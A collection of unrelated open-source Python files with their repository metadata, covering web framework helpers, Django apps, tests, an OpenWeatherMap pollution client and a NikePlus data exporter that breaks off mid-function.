'DATE_FORMAT': '%Y-%m-%dT%H:%M:%S.%fZ',
'MONGO_HOST': os.environ.get('MONGODB_PORT_27017_TCP_ADDR') or 'localhost',
'MONGO_PORT': int(os.environ.get('MONGODB_PORT_27017_TCP_PORT') or '27017'),
'MONGO_DBNAME': 'survey_server',
'PROPAGATE_EXCEPTIONS': True,
}
HOOKS_REGISTERS = [
ResultConfiguration.hooks(),
]
| {
"content_hash": "65401d10eaa673b2801e17e984f742fb",
"timestamp": "",
"source": "github",
"line_count": 25,
"max_line_length": 80,
"avg_line_length": 25.08,
"alnum_prop": 0.6634768740031898,
"repo_name": "fteychene/survey-server",
"id": "75cf84fd00a2a85b026ff9f688047c01b2732f18",
"size": "627",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/settings.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "5378"
}
],
"symlink_target": ""
} |
"""
Make a call graph for async functions.
Does not catch regular function calls.
"""
import string
from collections import OrderedDict
# utils
def is_func(line):
line = line.strip(string.whitespace)
return line.startswith('async def') or line.startswith('def')
all_whitespace = lambda line: not line.strip(string.whitespace)
def get_indent(line):
for i,c in enumerate(line):
if c not in string.whitespace:
return i
return -1
def find_func_names(lines):
"""Find all function names"""
def get_name(line):
return line.split('def ',1)[-1].split('(',1)[0]
names = []
found = False
indent = -1
for line in lines:
line = line.strip('\r\n')
if found and not all_whitespace(line):
if get_indent(line) <= indent:
found = False
if (not found) and is_func(line):
found = True
indent = get_indent(line)
names.append(get_name(line))
return names
def find_func(lines, name):
"""Find the lines of a specific function"""
is_my_func = lambda line: is_func(line) and name in line.split('(')[0]
found = False
indent = -1
last_line = ''
for line in lines:
line = line.strip('\r\n')
if last_line:
line = last_line+line.strip()
if line.strip().endswith(','):
last_line = line
else:
last_line = ''
if (not found) and is_my_func(line):
found = True
indent = get_indent(line)
elif found and not all_whitespace(line):
if get_indent(line) > indent:
yield line
else:
return # end of function
if not found:
raise Exception(f'{name} not found')
def process_func(lines, func_names):
"""Search for function calls"""
ret = OrderedDict()
for line in lines:
#print(f':: {line}')
for n in func_names:
if n+'(' in line:
name = line.split(n+'(')[0].split('(')[-1].split()[-1]+n
if name in ret:
ret[name] += 1
else:
ret[name] = 1
if 'await' in line:
line = line.split('await',1)[-1].strip()
if line.startswith('asyncio.ensure_future'):
line = line.split('(',1)[-1]
if 'rest_client.request' in line:
line = line.split(')',1)[0]+')'
else:
line = line.split('(',1)[0]
if line in ret:
ret[line] += 1
else:
ret[line] = 1
return ret
def analyze_calls(lines, funcname, indent=0, recurse=True):
func_names = find_func_names(lines)
calls = process_func(find_func(lines, funcname), func_names)
for c in calls:
if '.' in c and not c.startswith('self'):
continue
print(' '*indent+c)
if recurse:
if c.startswith('self.'):
c = c[5:]
try:
analyze_calls(lines, c, indent=indent+2, recurse=True)
except Exception as e:
#print(' '*indent,e)
pass
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('filename')
parser.add_argument('function')
parser.add_argument('-r','--recurse',default=True)
args = parser.parse_args()
print(f'searching for {args.function} in file {args.filename}')
with open(args.filename) as f:
lines = f.readlines()
print('')
print('Calls: ')
analyze_calls(lines, args.function, indent=0, recurse=args.recurse)
if __name__ == '__main__':
main() | {
"content_hash": "4df57f3b8c880b1f1130da5815c3d5a4",
"timestamp": "",
"source": "github",
"line_count": 123,
"max_line_length": 74,
"avg_line_length": 30.130081300813007,
"alnum_prop": 0.5315704263356719,
"repo_name": "WIPACrepo/iceprod",
"id": "f4caaa5f582d8cc8ec6d634b12796c04961c3345",
"size": "3706",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "resources/call_graph.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "13893"
},
{
"name": "Dockerfile",
"bytes": "1761"
},
{
"name": "HTML",
"bytes": "34188"
},
{
"name": "JavaScript",
"bytes": "77425"
},
{
"name": "Python",
"bytes": "1403059"
},
{
"name": "Shell",
"bytes": "4328"
}
],
"symlink_target": ""
} |
from rest_framework.decorators import api_view
from rest_framework.response import Response
from rest_framework.exceptions import APIException
@api_view()
def normal_response(request): # $ requestHandler
# has no pre-defined content type, since that will be negotiated
# see https://www.django-rest-framework.org/api-guide/responses/
data = "data"
resp = Response(data) # $ HttpResponse responseBody=data
return resp
@api_view()
def plain_text_response(request): # $ requestHandler
# this response is not the standard way to use the Djagno REST framework, but it
# certainly is possible -- notice that the response contains double quotes
data = 'this response will contain double quotes since it was a string'
resp = Response(data, None, None, None, None, "text/plain") # $ HttpResponse mimetype=text/plain responseBody=data
resp = Response(data=data, content_type="text/plain") # $ HttpResponse mimetype=text/plain responseBody=data
return resp
################################################################################
# Cookies
################################################################################
@api_view
def setting_cookie(request):
resp = Response() # $ HttpResponse
resp.set_cookie("key", "value") # $ CookieWrite CookieName="key" CookieValue="value"
resp.set_cookie(key="key4", value="value") # $ CookieWrite CookieName="key4" CookieValue="value"
resp.headers["Set-Cookie"] = "key2=value2" # $ MISSING: CookieWrite CookieRawHeader="key2=value2"
resp.cookies["key3"] = "value3" # $ CookieWrite CookieName="key3" CookieValue="value3"
resp.delete_cookie("key4") # $ CookieWrite CookieName="key4"
resp.delete_cookie(key="key4") # $ CookieWrite CookieName="key4"
return resp
################################################################################
# Exceptions
################################################################################
# see https://www.django-rest-framework.org/api-guide/exceptions/
@api_view(["GET", "POST"])
def exception_test(request): # $ requestHandler
data = "exception details"
# note: `code details` not exposed by default
code = "code details"
e1 = APIException(data, code) # $ HttpResponse responseBody=data
e2 = APIException(detail=data, code=code) # $ HttpResponse responseBody=data
raise e2
| {
"content_hash": "6e8a9807ebd6f2924dee5c6166cecdeb",
"timestamp": "",
"source": "github",
"line_count": 50,
"max_line_length": 118,
"avg_line_length": 47.32,
"alnum_prop": 0.621301775147929,
"repo_name": "github/codeql",
"id": "ec093499df63c897686815e6f1a2d64c08e5849a",
"size": "2366",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "python/ql/test/library-tests/frameworks/rest_framework/response_test.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "ASP.NET",
"bytes": "3739"
},
{
"name": "Batchfile",
"bytes": "3534"
},
{
"name": "C",
"bytes": "410440"
},
{
"name": "C#",
"bytes": "21146000"
},
{
"name": "C++",
"bytes": "1352639"
},
{
"name": "CMake",
"bytes": "1809"
},
{
"name": "CodeQL",
"bytes": "32583145"
},
{
"name": "Dockerfile",
"bytes": "496"
},
{
"name": "EJS",
"bytes": "1478"
},
{
"name": "Emacs Lisp",
"bytes": "3445"
},
{
"name": "Go",
"bytes": "697562"
},
{
"name": "HTML",
"bytes": "58008"
},
{
"name": "Handlebars",
"bytes": "1000"
},
{
"name": "Java",
"bytes": "5417683"
},
{
"name": "JavaScript",
"bytes": "2432320"
},
{
"name": "Kotlin",
"bytes": "12163740"
},
{
"name": "Lua",
"bytes": "13113"
},
{
"name": "Makefile",
"bytes": "8631"
},
{
"name": "Mustache",
"bytes": "17025"
},
{
"name": "Nunjucks",
"bytes": "923"
},
{
"name": "Perl",
"bytes": "1941"
},
{
"name": "PowerShell",
"bytes": "1295"
},
{
"name": "Python",
"bytes": "1649035"
},
{
"name": "RAML",
"bytes": "2825"
},
{
"name": "Ruby",
"bytes": "299268"
},
{
"name": "Rust",
"bytes": "234024"
},
{
"name": "Shell",
"bytes": "23973"
},
{
"name": "Smalltalk",
"bytes": "23"
},
{
"name": "Starlark",
"bytes": "27062"
},
{
"name": "Swift",
"bytes": "204309"
},
{
"name": "Thrift",
"bytes": "3020"
},
{
"name": "TypeScript",
"bytes": "219623"
},
{
"name": "Vim Script",
"bytes": "1949"
},
{
"name": "Vue",
"bytes": "2881"
}
],
"symlink_target": ""
} |
import os
import json
import datetime
import webapp2
import pkgutil
from time import mktime
from google.appengine.api import users
from google.appengine.ext import ndb
def set_api_path(api_path):
__all__ = []
for loader, module_name, is_pkg in pkgutil.walk_packages(api_path):
__all__.append(module_name)
module = loader.find_module(module_name).load_module(module_name)
exec('%s = module' % module_name)
default_methods = webapp2.WSGIApplication.allowed_methods
allowed_methods = default_methods.union(('PATCH',))
webapp2.WSGIApplication.allowed_methods = allowed_methods
def to_epoch_ms(value):
return mktime(value.utctimetuple()) * 1000
def from_epoch_ms(value):
return datetime.utcfromtimestamp(value / 1000)
def _to_json(value):
if isinstance(value, datetime.datetime):
return to_epoch_ms(value)
else:
return value
def stringify(obj):
return json.dumps(obj, default=_to_json)
class Endpoint(webapp2.RequestHandler):
def __init__(self, request, response):
self.initialize(request, response)
self.user = users.get_current_user()
self.user_id = self.user.user_id() if self.user else None
self.user_key = ndb.Key('User', self.user_id) if self.user else None
try:
self.entity = json.loads(request.body)
except ValueError:
self.entity = {}
def read_json(self):
return json.loads(self.request.body)
class App(webapp2.WSGIApplication):
def __init__(self, *args, **kwargs):
super(App, self).__init__(*args, **kwargs)
self.router.set_dispatcher(self.__class__.custom_dispatcher)
@staticmethod
def custom_dispatcher(router, request, response):
route, args, kwargs = rv = router.match(request)
request.route, request.route_args, request.route_kwargs = rv
if route.handler_adapter is None:
handler = route.handler
if isinstance(handler, basestring):
if handler not in router.handlers:
router.handlers[handler] = handler = import_string(handler)
else:
handler = router.handlers[handler]
route.handler_adapter = router.adapt(handler)
output = route.handler_adapter(request, response)
if isinstance(output, webapp2.Response): return output
if isinstance(output, int): return webapp2.Response(status = output)
if isinstance(output, tuple): return webapp2.Response(output[1], output[0])
output = webapp2.Response(stringify(output))
output.headers['Content-Type'] = 'application/json'
return output
def route(self, url, mime = None, *args, **kwargs):
def wrapper(handler):
route = webapp2.Route(url, handler=handler, *args, **kwargs)
route.mime = mime
self.router.add(route)
return handler
return wrapper
| {
"content_hash": "50fe4dc5d7f2a874015a5be95ff407a8",
"timestamp": "",
"source": "github",
"line_count": 86,
"max_line_length": 83,
"avg_line_length": 34.27906976744186,
"alnum_prop": 0.6472184531886025,
"repo_name": "trevorhreed/gae-demo",
"id": "036387737a82263e8387257f9f3d27906d787442",
"size": "2948",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "core.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "508"
},
{
"name": "HTML",
"bytes": "1629"
},
{
"name": "JavaScript",
"bytes": "19937"
},
{
"name": "Python",
"bytes": "5274"
}
],
"symlink_target": ""
} |
"""Database models"""
# pylint: disable=invalid-name,too-few-public-methods
from sqlalchemy import Column, ForeignKey, Integer, Text
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relationship
Base = declarative_base()
class Question(Base):
"""Quizz question model"""
__tablename__ = 'question'
id = Column(Integer, primary_key=True)
text = Column(Text)
answers = relationship(
'Answer',
back_populates='question',
cascade='all, delete, delete-orphan',
)
class Answer(Base):
"""Quizz answer model"""
__tablename__ = 'answer'
id = Column(Integer, primary_key=True)
text = Column(Text)
question_id = Column(Integer, ForeignKey('question.id'))
question = relationship('Question', back_populates='answers')
class Taunt(Base):
"""Taunt model"""
__tablename__ = 'taunt'
id = Column(Integer, primary_key=True)
nick = Column(Text)
text = Column(Text)
aggro = Column(Integer, default=5)
| {
"content_hash": "cbd7d163405572c4baa29f73beb589ea",
"timestamp": "",
"source": "github",
"line_count": 45,
"max_line_length": 65,
"avg_line_length": 22.77777777777778,
"alnum_prop": 0.6604878048780488,
"repo_name": "virtualtam/botibal",
"id": "7fbe90bbb6d58f60ade4d7a94325e17cd39b3bc5",
"size": "1025",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "botibal/models.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "424"
},
{
"name": "Makefile",
"bytes": "516"
},
{
"name": "Python",
"bytes": "57520"
}
],
"symlink_target": ""
} |
""" Unit testing stuff """
| {
"content_hash": "6d143cfeebce9a51afaa0a129c7aae67",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 26,
"avg_line_length": 27,
"alnum_prop": 0.5925925925925926,
"repo_name": "dustinbcox/email_parser",
"id": "431496ad7d6ab5515c1b7d1bbae2ed3a5056eeec",
"size": "27",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "7000"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django.db import migrations
import share.robot
class Migration(migrations.Migration):
dependencies = [
('share', '0001_initial'),
('djcelery', '0001_initial'),
]
operations = [
migrations.RunPython(
code=share.robot.RobotUserMigration('edu.vivo'),
),
migrations.RunPython(
code=share.robot.RobotOauthTokenMigration('edu.vivo'),
),
migrations.RunPython(
code=share.robot.RobotScheduleMigration('edu.vivo'),
),
]
| {
"content_hash": "ffba837bdbd0ec44995d9e9e0f624a01",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 66,
"avg_line_length": 24.041666666666668,
"alnum_prop": 0.6048526863084922,
"repo_name": "zamattiac/SHARE",
"id": "7cc5dc748d43a7186350abfb99b65cae1c6881fd",
"size": "649",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "providers/edu/vivo/migrations/0001_initial.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "3690"
},
{
"name": "HTML",
"bytes": "1582"
},
{
"name": "Python",
"bytes": "1517988"
},
{
"name": "Shell",
"bytes": "633"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import, unicode_literals
import importlib
from contextlib import contextmanager
from case import (
ANY, Case, ContextMock, MagicMock, Mock,
call, mock, skip, patch, sentinel,
)
__all__ = [
'ANY', 'Case', 'ContextMock', 'MagicMock', 'Mock',
'call', 'mock', 'skip', 'patch', 'sentinel',
'HubCase', 'PromiseMock', 'MockPool', 'set_module_symbol',
]
class HubCase(Case):
def setUp(self):
from kombu.async import Hub, get_event_loop, set_event_loop
self._prev_hub = get_event_loop()
self.hub = Hub()
set_event_loop(self.hub)
super(HubCase, self).setUp()
def tearDown(self):
try:
super(HubCase, self).tearDown()
finally:
from kombu.async import set_event_loop
if self._prev_hub is not None:
set_event_loop(self._prev_hub)
def PromiseMock(*args, **kwargs):
m = Mock(*args, **kwargs)
def on_throw(exc=None, *args, **kwargs):
if exc:
raise exc
raise
m.throw.side_effect = on_throw
m.set_error_state.side_effect = on_throw
m.throw1.side_effect = on_throw
return m
class MockPool(object):
def __init__(self, value=None):
self.value = value or ContextMock()
def acquire(self, **kwargs):
return self.value
@contextmanager
def set_module_symbol(module, key, value):
module = importlib.import_module(module)
prev = getattr(module, key)
setattr(module, key, value)
try:
yield
finally:
setattr(module, key, prev)
| {
"content_hash": "23566da12261a3a6557198f21e455a31",
"timestamp": "",
"source": "github",
"line_count": 68,
"max_line_length": 67,
"avg_line_length": 23.441176470588236,
"alnum_prop": 0.6041405269761606,
"repo_name": "Elastica/kombu",
"id": "057229e165f067e2d6ecb277ba260339f4167e83",
"size": "1594",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "kombu/tests/case.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "1842"
},
{
"name": "Makefile",
"bytes": "1514"
},
{
"name": "PowerShell",
"bytes": "2786"
},
{
"name": "Python",
"bytes": "1017395"
},
{
"name": "Shell",
"bytes": "1955"
}
],
"symlink_target": ""
} |
try:
from urllib.error import HTTPError, URLError
from urllib.parse import urlencode
except ImportError:
from urllib2 import HTTPError, URLError
from urllib import urlencode
import socket
from pyowm.exceptions import api_call_error, not_found_error, unauthorized_error
from pyowm.utils import timeformatutils
from pyowm.webapi25.configuration25 import ROOT_POLLUTION_API_URL, \
CO_INDEX_URL, OZONE_URL
class AirPollutionHttpClient(object):
"""
An HTTP client class for the OWM Air Pollution web API. The class can
leverage a caching mechanism
:param API_key: a Unicode object representing the OWM Air Pollution web API key
:type API_key: Unicode
:param cache: an *OWMCache* concrete instance that will be used to \
cache OWM Air Pollution web API responses.
:type cache: an *OWMCache* concrete instance
"""
def __init__(self, API_key, cache):
self._API_key = API_key
self._cache = cache
self._API_root_URL = ROOT_POLLUTION_API_URL
def _trim_to(self, date_object, interval):
if interval == 'minute':
return date_object.strftime('%Y-%m-%dT%H:%MZ')
elif interval == 'hour':
return date_object.strftime('%Y-%m-%dT%HZ')
elif interval == 'day':
return date_object.strftime('%Y-%m-%dZ')
elif interval == 'month':
return date_object.strftime('%Y-%mZ')
elif interval == 'year':
return date_object.strftime('%YZ')
else:
raise ValueError("The interval provided for the search "
"window is invalid")
def _lookup_cache_or_invoke_API(self, cache, API_full_url, timeout):
cached = cache.get(API_full_url)
if cached:
return cached
else:
try:
try:
from urllib.request import urlopen
except ImportError:
from urllib2 import urlopen
response = urlopen(API_full_url, None, timeout)
except HTTPError as e:
if '401' in str(e):
raise unauthorized_error.UnauthorizedError('Invalid API key')
if '404' in str(e):
raise not_found_error.NotFoundError('The resource was not found')
if '502' in str(e):
raise api_call_error.BadGatewayError(str(e), e)
raise api_call_error.APICallError(str(e), e)
except URLError as e:
raise api_call_error.APICallError(str(e), e)
else:
data = response.read().decode('utf-8')
cache.set(API_full_url, data)
return data
def get_coi(self, params_dict, timeout=socket._GLOBAL_DEFAULT_TIMEOUT):
"""
Invokes the CO Index endpoint
:param params_dict: dict of parameters
:param timeout: how many seconds to wait for connection establishment \
(defaults to ``socket._GLOBAL_DEFAULT_TIMEOUT``)
:type timeout: int
:returns: a string containing raw JSON data
:raises: *ValueError*, *APICallError*
"""
lat = str(params_dict['lat'])
lon = str(params_dict['lon'])
start = params_dict['start']
interval = params_dict['interval']
# build request URL
url_template = '%s%s/%s,%s/%s.json?appid=%s'
if start is None:
timeref = 'current'
else:
if interval is None:
timeref = self._trim_to(
timeformatutils.to_date(start), 'year')
else:
timeref = self._trim_to(
timeformatutils.to_date(start), interval)
url = url_template % (ROOT_POLLUTION_API_URL, CO_INDEX_URL, lat, lon,
timeref, self._API_key)
return self._lookup_cache_or_invoke_API(self._cache, url, timeout)
def get_o3(self, params_dict, timeout=socket._GLOBAL_DEFAULT_TIMEOUT):
"""
Invokes the O3 Index endpoint
:param params_dict: dict of parameters
:param timeout: how many seconds to wait for connection establishment \
(defaults to ``socket._GLOBAL_DEFAULT_TIMEOUT``)
:type timeout: int
:returns: a string containing raw JSON data
:raises: *ValueError*, *APICallError*
"""
lat = str(params_dict['lat'])
lon = str(params_dict['lon'])
start = params_dict['start']
interval = params_dict['interval']
# build request URL
url_template = '%s%s/%s,%s/%s.json?appid=%s'
if start is None:
timeref = 'current'
else:
if interval is None:
timeref = self._trim_to(
timeformatutils.to_date(start), 'year')
else:
timeref = self._trim_to(
timeformatutils.to_date(start), interval)
url = url_template % (ROOT_POLLUTION_API_URL, OZONE_URL, lat, lon,
timeref, self._API_key)
return self._lookup_cache_or_invoke_API(self._cache, url, timeout)
def __repr__(self):
return "<%s.%s - cache=%s>" % \
(__name__, self.__class__.__name__, repr(self._cache)) | {
"content_hash": "1ebbe5472846914c187d5511029238bf",
"timestamp": "",
"source": "github",
"line_count": 143,
"max_line_length": 85,
"avg_line_length": 37.19580419580419,
"alnum_prop": 0.5653318292912202,
"repo_name": "mpvoss/RickAndMortyWeatherTweets",
"id": "def200eae78dadf892169dd208308ac02212bcbf",
"size": "5358",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "env/lib/python3.5/site-packages/pyowm/commons/airpollution_client.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "13428"
}
],
"symlink_target": ""
} |
import pytest
import requests
import requests_mock
from pybib import utils
from hamcrest import *
class MockRequest:
def __init__(self, code):
self.code = code
@property
def status_code(self):
return self.code
def test_handle_status_code_200():
utils.handle_status_code(MockRequest(200))
def test_handle_status_code_404():
with pytest.raises(SystemExit):
utils.handle_status_code(MockRequest(404))
def test_handle_status_code_unknown():
with pytest.raises(SystemExit):
utils.handle_status_code(MockRequest(1))
def test_search():
search_json_response = """
{
"message-version": "1.0.0",
"message": {
"facets": {},
"query": {
"start-index": 0,
"search-terms": "test"
},
"total-results": 1,
"items": [{
"source": "CrossRef",
"title": ["Test Citation"],
"type": "dissertation", "URL": "http://dx.doi.org/test.doi",
"deposited": {"timestamp": 1000, "date-parts": [[2015, 1, 1]]},
"container-title": [],
"author": [{"given": "Test", "affiliation": [], "family": "Test"}],
"reference-count": 0,
"member": "http://id.crossref.org/member/xxx",
"subtitle": [],
"indexed": { "timestamp": 1000, "date-parts": [[2015, 1, 1]] },
"prefix": "http://id.crossref.org/prefix/test",
"publisher": "Test Publisher",
"score": 1.0,
"DOI": "test.doi",
"issued": { "date-parts": [[]] }
}]
}
}
"""
with requests_mock.mock() as m:
m.get('http://api.crossref.org/works', text=search_json_response)
entries = utils.search('test.doi')
print(entries)
assert_that(len(entries), equal_to(1))
entry = entries[0]
assert_that(entry["title"], equal_to(["Test Citation"]))
def test_get_bibtex():
with requests_mock.mock() as m:
m.get('http://dx.doi.org/test.doi', text='abc')
entry = utils.get_bibtex('test.doi')
assert_that(entry, equal_to('abc'))
| {
"content_hash": "53557ec49d36d4b75c0d55f27a61e874",
"timestamp": "",
"source": "github",
"line_count": 76,
"max_line_length": 83,
"avg_line_length": 29.31578947368421,
"alnum_prop": 0.5175044883303411,
"repo_name": "jgilchrist/pybib",
"id": "d8196798a2a3d7a36f4f4efdc9a227198050cafa",
"size": "2228",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_utils.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "175"
},
{
"name": "Python",
"bytes": "12455"
}
],
"symlink_target": ""
} |
from django.forms.forms import BaseForm
from django.forms.widgets import media_property
from django.http import HttpResponseRedirect
from six import with_metaclass
from .constants import WIZARD_TYPE_COOKIE, WIZARD_TYPE_SESSION
from formtools.wizard.views import (
CookieWizardView,
SessionWizardView,
WizardView,
)
from collections import OrderedDict
from django.urls import reverse
__title__ = 'fobi.dynamic'
__author__ = 'Artur Barseghyan <[email protected]>'
__copyright__ = '2014-2017 Artur Barseghyan'
__license__ = 'GPL 2.0/LGPL 2.1'
__all__ = (
'assemble_form_class',
'assemble_form_wizard_class',
)
# ****************************************************************************
# ****************************************************************************
# **************************** Form generator ********************************
# ****************************************************************************
# ****************************************************************************
def assemble_form_class(form_entry, base_class=BaseForm, request=None,
origin=None, origin_kwargs_update_func=None,
origin_return_func=None, form_element_entries=None,
get_form_field_instances_kwargs={}):
"""Assemble a form class by given entry.
:param form_entry:
:param base_class:
:param django.http.HttpRequest request:
:param string origin:
:param callable origin_kwargs_update_func:
:param callable origin_return_func:
:param iterable form_element_entries: If given, used instead of
``form_entry.formelemententry_set.all`` (no additional database hit).
:param dict get_form_field_instances_kwargs: To be passed as **kwargs to
the :method:`get_form_field_instances_kwargs`.
"""
if form_element_entries is None:
form_element_entries = form_entry.formelemententry_set.all()
# DeclarativeFieldsMetaclass
class DeclarativeFieldsMetaclass(type):
"""Declarative fields meta class.
Copied from ``django.forms.forms.DeclarativeFieldsMetaclass``.
Metaclass that converts Field attributes to a dictionary called
`base_fields`, taking into account parent class 'base_fields' as well.
"""
def __new__(cls, name, bases, attrs):
"""New."""
base_fields = []
for creation_counter, form_element_entry \
in enumerate(form_element_entries):
plugin = form_element_entry.get_plugin(request=request)
# We simply make sure the plugin exists. We don't handle
# exceptions relate to the non-existent plugins here. They
# are instead handled in registry.
if plugin:
plugin_form_field_instances = \
plugin._get_form_field_instances(
form_element_entry=form_element_entry,
origin=origin,
kwargs_update_func=origin_kwargs_update_func,
return_func=origin_return_func,
extra={'counter': creation_counter},
request=request,
form_entry=form_entry,
form_element_entries=form_element_entries,
**get_form_field_instances_kwargs
)
for form_field_name, form_field_instance \
in plugin_form_field_instances:
base_fields.append(
(form_field_name, form_field_instance)
)
attrs['base_fields'] = OrderedDict(base_fields)
new_class = super(DeclarativeFieldsMetaclass, cls).__new__(
cls, name, bases, attrs
)
if 'media' not in attrs:
new_class.media = media_property(new_class)
return new_class
# DynamicForm
class DynamicForm(with_metaclass(DeclarativeFieldsMetaclass, base_class)):
"""Dynamically created form element plugin class."""
# Finally, return the DynamicForm
return DynamicForm
| {
"content_hash": "1e509e83f34be902b7ea9c6aaeb32b16",
"timestamp": "",
"source": "github",
"line_count": 110,
"max_line_length": 78,
"avg_line_length": 39.03636363636364,
"alnum_prop": 0.5407545412203074,
"repo_name": "mansonul/events",
"id": "bac27e246b0cd33f7972f9da6b43fd8e20d01c3a",
"size": "4294",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "events/dynamic.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "90251"
},
{
"name": "HTML",
"bytes": "186225"
},
{
"name": "JavaScript",
"bytes": "43221"
},
{
"name": "Python",
"bytes": "804726"
},
{
"name": "Shell",
"bytes": "4196"
}
],
"symlink_target": ""
} |
"""toger URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import include, url
from polls import views
app_name = 'polls'
urlpatterns = [
# ex: /polls/
url(r'^$',views.IndexView.as_view(), name= 'index'),
# ex: /polls/5/
url(r'^(?P<pk>[0-9]+)/$',views.DetailView.as_view(), name= 'detail'),
# ex: /polls/5/results/
url(r'^(?P<pk>[0-9]+)/results/$',views.ResultsView.as_view(), name= 'results'),
# ex: /polls/5/vote/
url(r'^(?P<question_id>[0-9]+)/vote/$',views.vote, name= 'vote'),
]
| {
"content_hash": "fec18ba202a274d7b3417b3c4e0d689d",
"timestamp": "",
"source": "github",
"line_count": 29,
"max_line_length": 83,
"avg_line_length": 38.58620689655172,
"alnum_prop": 0.646112600536193,
"repo_name": "MarsBighead/mustang",
"id": "9b2bf9a563e94385c72dec2314c745ffa660cccd",
"size": "1119",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Python/polls/urls.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "622"
},
{
"name": "C++",
"bytes": "15533"
},
{
"name": "CSS",
"bytes": "2525"
},
{
"name": "Dockerfile",
"bytes": "499"
},
{
"name": "Erlang",
"bytes": "5855"
},
{
"name": "Go",
"bytes": "3879"
},
{
"name": "HTML",
"bytes": "3879"
},
{
"name": "Java",
"bytes": "541"
},
{
"name": "JavaScript",
"bytes": "7858"
},
{
"name": "Julia",
"bytes": "2223"
},
{
"name": "Makefile",
"bytes": "650"
},
{
"name": "Modula-3",
"bytes": "43"
},
{
"name": "PHP",
"bytes": "771"
},
{
"name": "PLpgSQL",
"bytes": "4642"
},
{
"name": "Perl",
"bytes": "46253"
},
{
"name": "Python",
"bytes": "110755"
},
{
"name": "Raku",
"bytes": "378"
},
{
"name": "Shell",
"bytes": "22680"
}
],
"symlink_target": ""
} |
"""
Export nikeplus data to csv or print to screen
"""
import argparse
from collections import namedtuple
import csv
from datetime import datetime
import json
import os.path
import sys
import time
import urllib2
# FIXME: Could use descriptors here:
# - Could hold: default value, api name, pretty name, and conversion func
# Key = our internal name
# Value = nike plus API name (None for custom, not represented in API)
name_to_api = {'calories': 'calories',
'fuel': 'fuel',
'steps': 'steps',
'device': 'deviceType',
'duration': 'duration',
'pace': None,
'kilometers': None,
'miles': None,
# Time in iso format as string
'start_time': 'startTime',
# Redundant now but easier to include since it maps directly to
# the API.
'distance': 'distance'}
NikePlusActivity = namedtuple('NikePlusActivity', name_to_api.keys())
km_to_mi = lambda distance: float(distance) * 0.621371
DATE_FMT = '%Y-%m-%d'
def _validate_date_str(str_):
"""Validate str as a date and return string version of date"""
if not str_:
return None
# Convert to datetime so we can validate it's a real date that exists then
# convert it back to the string.
try:
date = datetime.strptime(str_, DATE_FMT)
except ValueError:
msg = 'Invalid date format, should be YYYY-MM-DD'
raise argparse.ArgumentTypeError(msg)
return date.strftime(DATE_FMT)
def _parse_args():
"""Parse sys.argv arguments"""
token_file = os.path.expanduser('~/.nikeplus_access_token')
parser = argparse.ArgumentParser(description='Export NikePlus data to CSV')
parser.add_argument('-t', '--token', required=False, default=None,
help=('Access token for API, can also store in file %s'
' to avoid passing via command line' % (token_file)))
parser.add_argument('-s', '--since', type=_validate_date_str,
help=('Only process entries starting with YYYY-MM-DD '
'and newer'))
args = vars(parser.parse_args())
if args['token'] is None:
try:
with open(token_file, 'r') as _file:
access_token = _file.read().strip()
except IOError:
print 'Must pass access token via command line or store in file %s' % (
token_file)
sys.exit(-1)
args['token'] = access_token
return args
def calculate_mile_pace(duration, miles):
pace = ''
sp = duration.split(':')
if len(sp) == 3:
duration_seconds = int(sp[0]) * 60 * 60 + int(sp[1]) * 60 + int(sp[2])
seconds_per_mile = 0.0
if miles:
seconds_per_mile = duration_seconds / miles
hours, remainder = divmod(seconds_per_mile, 3600)
minutes, seconds = divmod(remainder, 60)
pace = '(%.0f\'%02.0f/mi)' % (minutes, seconds)
return pace
def decode_activity(activity):
metrics = activity.get('metricSummary')
api_values = {}
for pretty_name, api_name in name_to_api.iteritems():
if api_name is not None:
# Values can be in 1 of 2 dicts, metric sub-dict or 'root' activity
# dict
try:
api_values[pretty_name] = metrics[api_name]
except KeyError:
api_values[pretty_name] = activity.get(api_name, None)
# Custom values/sanitizing
# remove milliseconds
api_values['duration'] = api_values['duration'].partition('.')[0]
